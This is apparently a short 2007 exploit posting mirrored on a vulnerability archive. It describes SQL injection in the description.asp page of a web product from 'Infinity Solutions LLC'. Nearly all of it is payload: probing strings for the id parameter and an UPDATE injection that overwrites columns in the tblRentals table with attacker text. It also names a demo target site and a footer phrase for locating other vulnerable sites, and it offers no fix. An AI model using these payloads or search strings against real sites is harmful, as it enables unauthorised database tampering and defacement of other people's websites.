Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17436
HistoryJul 10, 2007 - 12:00 a.m.

http://marmarahosting.org/infinity.txt

2007-07-1000:00:00
vulners.com
11

"Infinity Solutions LLC" e/description.asp sql injection


Credit : CodeXpLoder'tq

mail : codexploder[at]hotmail[dot]com

site : Biyosecurity.net,expw0rm.com

thx : BiyoSecurityTeam

spec.note : "Live The Life"


1-) example.com/[patch]/description.asp?id=(sql methot)

1-) example.com/e/description.asp?id=(sql methot)


2-) example.com/e/description.asp?id=1'

2-) example.com/e/description.asp?id=1 having 1=1

2-) example.com/e/description.asp?id=1,2,3,4,5

2-) example.com/e/description.asp?id=1,2,3,4,5+update+tbl+set+column='your text or meta code';–

#tbl : tblRentals
#column : model,category


sourge site : http://www.infinitysolutionsllc.com/

demo site : http://www.lcd-projector-rentals-ab.com

order code for views site :"Site Developed and Maintained by Infinity Solutions LLC"